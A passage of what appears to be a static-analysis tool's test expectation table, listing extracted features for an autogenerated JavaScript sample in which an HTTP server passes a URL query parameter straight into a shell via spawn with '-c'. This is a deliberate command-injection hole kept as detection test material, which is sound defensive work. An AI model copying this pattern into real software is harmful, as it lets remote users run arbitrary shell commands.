exceptional return of getShell() | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | exceptional return of getShell() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | exceptional return of getShell() | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | exceptional return of getShell() | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | exceptional return of getShell() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:21:10:30 | getShell() | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:33:10:47 | ["-c", command] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:34:10:37 | "-c" | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | enclosingFunctionBody | command options cp spawn getShell -c command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:50:10:56 | options | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:4 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:4 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:4 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:17 | http.createServer | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:17 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:13:17 | http.createServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | exceptional return of http.cr ... md);\\n}) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | exceptional return of http.cr ... md);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | exceptional return of http.cr ... md);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | http.cr ... md);\\n}) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | http.cr ... md);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:1:16:2 | http.cr ... md);\\n}) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:6:13:17 | createServer | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:6:13:17 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:6:13:17 | createServer | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | execSh | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | execSh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | this | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:13:18 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | 'arguments' object of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | exceptional return of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | exceptional return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | functio ... cmd);\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | return of anonymous function | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:19:16:1 | return of anonymous function | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:29:13:31 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:34:13:36 | res | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:34:13:36 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:34:13:36 | res | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:34:13:36 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:13:34:13:36 | res | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:11 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:11 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:11 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:11 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:11 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd = u ... ry.path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd = u ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd = u ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd = u ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:9:14:49 | cmd = u ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:17 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:17 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:17 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:17 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:17 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:23 | url.parse | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:23 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:23 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:23 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:23 | url.parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | exceptional return of url.par ... , true) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | exceptional return of url.par ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:38 | url.par ... , true) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:44 | url.par ... ).query | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:44 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:44 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:44 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:44 | url.par ... ).query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:49 | url.par ... ry.path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:49 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:49 | url.par ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:49 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:15:14:49 | url.par ... ry.path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:19:14:23 | parse | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:19:14:23 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:19:14:23 | parse | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:19:14:23 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:19:14:23 | parse | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:27 | req | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:27 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:27 | req | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:27 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:27 | req | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:25:14:31 | req.url | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:29:14:31 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:29:14:31 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:29:14:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:29:14:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:29:14:31 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | CalleeFlexibleAccessPath | url.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | calleeImports | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 